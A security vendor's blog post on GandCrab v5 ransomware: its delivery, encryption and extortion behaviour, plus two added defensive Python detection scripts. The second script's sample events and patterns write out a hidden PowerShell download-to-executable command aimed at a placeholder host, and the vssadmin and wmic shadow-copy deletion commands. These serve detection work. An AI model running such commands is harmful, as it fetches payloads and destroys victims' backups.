Barkly vs Malware
Barkly Research
Oct 2018

2018's Most Active Ransomware: The Ongoing Evolution of GandCrab


The discovery of GandCrab v5 reveals 2018's most prolific ransomware is continuing to experiment with new features. Find out what's new and how to protect your organization.

Researchers announced the discovery of GandCrab v5 last week, the latest major update to a strain of ransomware that has gained significant traction in the criminal community this year. In this post, we'll highlight what's new with the latest version, including changes to its encryption routine and how the ransomware is being delivered. But first, let's take a quick look back at how we got here.

Ransomware goes agile: Tracking the many iterations of GandCrab in 2018


Timeline of primary GandCrab updates.

It's been a busy year for the criminals behind GandCrab. First appearing in late January, the ransomware found success almost immediately, infecting more than 50,000 victims in less than a month. The success also earned the group the attention of the authorities, however, and in late February a collaboration between Bitdefender, Europol, and the Romanian Police resulted in the seizure of command-and-control servers and the release of a decryption tool victims could use to recover their encrypted files. 

The raid was unfortunately just a minor setback. Within a week GandCrab v2 was released, rendering the decryption tool ineffective.

GandCrab authors would continue iterating from there, consistently making tweaks, issuing updates, and fixing bugs on a regular basis. Thanks in part to this "agile" approach, GandCrab has managed to stay one step ahead of many traditional security solutions and gain widespread popularity amongst criminals who rent it out for use in their own campaigns. 

GandCrab Version 5   


GandCrab v5 was discovered on September 24, but, true to form, its authors busily spent the next week working out kinks and making minor changes, resulting in version 5.0.4 appearing by October 2.   

Some of the immediate changes in version 5 included appending a random 5-character extension to encrypted files and changes to the ransom note. But later, security researcher Valthek noticed the ransomware appeared to be attempting to incorporate the same exploit code for the Windows Task Scheduler ALPC zero-day vulnerability (CVE-2018-8440) publicly released in late August. If utilized correctly, the exploit can provide GandCrab attacks with an avenue for elevating privileges once the ransomware is installed on infected machines. Microsoft released a fix for the vulnerability as part of its September 2018 updates. If they haven't already, organizations are advised to patch to mitigate that specific threat as soon as possible. 

How victims are getting infected with GandCrab v5


GandCrab attack diagram.

GandCrab v5 was initially reported being delivered via the Fallout exploit kit, though there are indications that Fallout may now be delivering Kraken ransomware, instead.   

As researchers at FireEye explain, Fallout works by compromising ad networks so that ads with malicious code hidden inside them show up on legitimate websites (a technique referred to as malvertising). The exploit kit currently contains code to take advantage of CVE-2018-8174, a VBScript vulnerability. If a user has a vulnerable system, the exploit kit triggers a process that downloads and executes GandCrab on the user's machine. If the user's system is patched, the user is instead directed to social engineering prompts that attempt to trick them into downloading the payload.



Social engineering lures used to trick users into downloading GandCrab on fully patched machines. Source: FireEye

GandCrab has also previously been distributed via spam emails with malicious attachments, so organizations should be prepared to see the ransomware potentially using that popular attack vector, as well. 


Encryption and extortion

Once installed, GandCrab scans the compromised system and any network shares (not just mapped drives) for files to encrypt. It also has the ability to kill processes belonging to popular applications such as Word and Excel in order to encrypt files currently in use. When it encrypts files, GandCrab appends a random 5-character file extension and drops .txt ransom note files. In addition, the victim's desktop wallpaper is changed to instruct them to read the ransom note.
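The behaviours just described (files renamed to a random 5-character extension, network shares touched, a .txt note dropped in the same folders) are exactly what a host-based detection can key on. The following script is an added illustration written for this post, not code from Barkly or from the GandCrab samples: it runs a simple burst heuristic over constructed file-system audit events. The log format, host name, process ids, paths and the note file name RECOVER-FILES.txt are all made up for the example, and the "original extension kept, five lowercase letters appended" pattern is an assumption drawn from the description above rather than a verified signature.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed file-system audit events for the demo (not real GandCrab telemetry).
# Format per line: <ISO timestamp> <host> <pid> <RENAME|CREATE> <path> [-> <newpath>]
SAMPLE_EVENTS = r"""
2018-10-03T10:02:11 WS01 4120 RENAME C:\Users\alice\Documents\budget.xlsx -> C:\Users\alice\Documents\budget.xlsx.kqzwb
2018-10-03T10:02:11 WS01 4120 RENAME C:\Users\alice\Documents\plan.docx -> C:\Users\alice\Documents\plan.docx.kqzwb
2018-10-03T10:02:12 WS01 4120 CREATE C:\Users\alice\Documents\RECOVER-FILES.txt
2018-10-03T10:02:12 WS01 4120 RENAME \\FILESRV\share\q3.pptx -> \\FILESRV\share\q3.pptx.kqzwb
2018-10-03T10:02:13 WS01 4120 RENAME \\FILESRV\share\notes.txt -> \\FILESRV\share\notes.txt.kqzwb
2018-10-03T10:02:14 WS01 4120 RENAME C:\Users\alice\Pictures\cat.jpg -> C:\Users\alice\Pictures\cat.jpg.kqzwb
2018-10-03T10:05:40 WS01 2288 RENAME C:\Users\alice\Downloads\report.tmp -> C:\Users\alice\Downloads\report.pdf
2018-10-03T10:06:02 WS01 2288 CREATE C:\Users\alice\Downloads\readme.txt
""".strip().splitlines()

EVENT_RE = re.compile(r"^(\S+) (\S+) (\d+) (RENAME|CREATE) (.+?)(?: -> (.+))?$")
# "<name>.<original ext>.<xxxxx>": original extension kept, 5-letter suffix appended
# (assumed pattern for the demo, not a verified GandCrab signature).
APPENDED_EXT_RE = re.compile(r"^.+\.[A-Za-z0-9]{1,5}\.([a-z]{5})$")


def parse_event(line):
    """Parse one audit line into a dict, or None if it does not match the format."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, host, pid, op, path, newpath = m.groups()
    return {"ts": datetime.fromisoformat(ts), "host": host, "pid": int(pid),
            "op": op, "path": path, "newpath": newpath}


def appended_extension(path):
    """Return the appended 5-letter extension if the file name looks like name.ext.xxxxx, else None."""
    m = APPENDED_EXT_RE.match(path.rsplit("\\", 1)[-1])
    return m.group(1) if m else None


def detect_encryption_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag any process that renames >= threshold files to the same appended 5-letter
    extension within `window`, and report .txt files it created in those folders."""
    renames = defaultdict(list)     # (host, pid, ext) -> [(ts, newpath), ...]
    txt_created = defaultdict(set)  # (host, pid) -> {paths of .txt files created}
    for e in filter(None, map(parse_event, lines)):
        proc = (e["host"], e["pid"])
        if e["op"] == "RENAME" and e["newpath"]:
            ext = appended_extension(e["newpath"])
            if ext:
                renames[proc + (ext,)].append((e["ts"], e["newpath"]))
        elif e["op"] == "CREATE" and e["path"].lower().endswith(".txt"):
            txt_created[proc].add(e["path"])

    alerts = []
    for (host, pid, ext), items in renames.items():
        items.sort()
        start, peak = 0, 0
        for end in range(len(items)):  # sliding window over sorted timestamps
            while items[end][0] - items[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        dirs = {p.rsplit("\\", 1)[0] for _, p in items}
        alerts.append({
            "host": host, "pid": pid, "extension": ext, "renames_in_window": peak,
            # UNC paths show the process reached into network shares, not just local drives
            "touched_network_share": any(p.startswith("\\\\") for _, p in items),
            # a .txt dropped into a folder the process just renamed files in is a note candidate
            "ransom_note_candidates": sorted(p for p in txt_created[(host, pid)]
                                             if p.rsplit("\\", 1)[0] in dirs),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_encryption_bursts(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are the tuning knobs: a user batch-renaming photos can trip a pure rename count, so the rule only fires when the same appended extension recurs within a short window, and the network-share and note-file fields give an analyst the context to triage quickly. On the constructed sample only the process with pid 4120 is flagged; the legitimate rename of report.tmp to report.pdf does not match the appended-extension pattern.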

You can see what the encryption process looks like in the video below:


Victims are directed to a Tor site, where they are presented with the ransom amount (currently $800 USD to be paid in DASH cryptocurrency) and instructions on how to pay. 

Unfortunately, there is no free decryption tool available to help victims of GandCrab at this time. As with most ransomware, the best option is to take precautions to avoid infections in the first place, and to be prepared with system backup and recovery options if an infection does take place. 

Researcher Valthek has developed a "vaccine" that prevents computers from being infected with GandCrab.  

It should be noted that a vaccine was also previously developed for GandCrab version 4.1.2 by security vendor AhnLab, resulting in a bitter reaction from the GandCrab author(s). Unfortunately, it was short-lived and rendered ineffective by a subsequent GandCrab update.

Blocking GandCrab with Barkly

Barkly vs GandCrab v5 diagram.

GandCrab's constant updates present a challenge for traditional security solutions that rely on creating and maintaining lists of malicious signatures. The use of multiple attack vectors along with constant changes to the ransomware's code puts an emphasis on defense in depth.

Barkly provides organizations with multiple layers of protection from the latest GandCrab versions by blocking their delivery and their behavior in addition to the ransomware payloads, themselves. 

  • Barkly prevents initial delivery by blocking attempts to exploit CVE-2018-8174 and stopping malicious macros from utilizing PowerShell to download files from the Internet. That means the majority of attacks are blocked before the GandCrab payload can even touch the machine. 
  • For attacks that do manage to install GandCrab, Barkly blocks the executable before it has a chance to launch.
  • In the unlikely event a new version of GandCrab somehow was able to launch, Barkly has behavioral controls in place that prevent ransomware activity such as attempts to delete volume shadow copies. 
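The first and third bullets describe behaviours rather than file signatures, which is what makes them robust against GandCrab's frequent code changes. As an added example (written for this post; the post does not describe how Barkly's own controls are implemented), the script below expresses those two behaviours as rules over constructed Sysmon-style process-creation records: an Office application spawning PowerShell with a download cmdlet, and a shadow copy deletion via vssadmin or wmic. The host names, paths and command lines are made up for the demo, and the backup-agent allowlist entry is a placeholder standing in for whatever backup software legitimately prunes shadow copies in a given environment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample records for the demo (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/p', 'C:\\Users\\Public\\p.exe')\""),
    ProcessEvent("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe Delete Shadows /All /Quiet"),
    ProcessEvent("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic shadowcopy delete"),
    # Placeholder backup agent pruning old shadow copies: legitimate, must not alert.
    ProcessEvent("SRV02", r"C:\Program Files\ExampleBackup\agent.exe",
                 r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe Delete Shadows /For=D: /Oldest /Quiet"),
    ProcessEvent("WS03", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Get-Process | Sort-Object CPU"),
    ProcessEvent("WS03", r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\Scripts\\refresh-report.ps1"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Constructed allowlist (placeholder path): backup products that legitimately delete shadow copies.
BACKUP_AGENT_PARENTS = {r"c:\program files\examplebackup\agent.exe"}

SHADOW_DELETE_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete"),
    re.compile(r"win32_shadowcopy.*(remove-wmiobject|\.delete\(\))"),
]
DOWNLOAD_PATTERN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _norm(cmd: str) -> str:
    """Lowercase and collapse whitespace so spacing tricks do not defeat the patterns."""
    return " ".join(cmd.lower().split())


def rule_shadow_copy_deletion(e: ProcessEvent) -> Optional[str]:
    """Shadow copy deletion from any parent except an allowlisted backup agent."""
    if e.parent_image.lower() in BACKUP_AGENT_PARENTS:
        return None
    cmd = _norm(e.command_line)
    if any(p.search(cmd) for p in SHADOW_DELETE_PATTERNS):
        return "shadow_copy_deletion"
    return None


def rule_office_spawns_downloader(e: ProcessEvent) -> Optional[str]:
    """An Office process launching PowerShell with a download cmdlet: the macro-dropper pattern."""
    if (_basename(e.parent_image) in OFFICE_APPS and _basename(e.image) in SHELLS
            and DOWNLOAD_PATTERN.search(_norm(e.command_line))):
        return "office_powershell_download"
    return None


RULES = (rule_shadow_copy_deletion, rule_office_spawns_downloader)


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Run every rule over every event; return (rule name, host, child image) per hit."""
    hits = []
    for e in events:
        for rule in RULES:
            name = rule(e)
            if name:
                hits.append((name, e.host, _basename(e.image)))
    return hits


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

Two design points carry over to real deployments. Matching on parent/child relationship plus command line, rather than on the PowerShell binary alone, keeps the Office rule from firing on the many legitimate scripts users and admins run. And the shadow copy rule needs an allowlist keyed on the parent process, because backup software does delete shadow copies as part of normal retention; without it the rule is too noisy to act on automatically.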


For organizations that aren't in a position to use Barkly, it can still be helpful to position defenses in a similar way: eliminate single points of failure and provide protections and mitigations for each stage of an attack. You can get tips for doing just that in our eBook, The Essential Guide to Blocking Malware without a SOC.
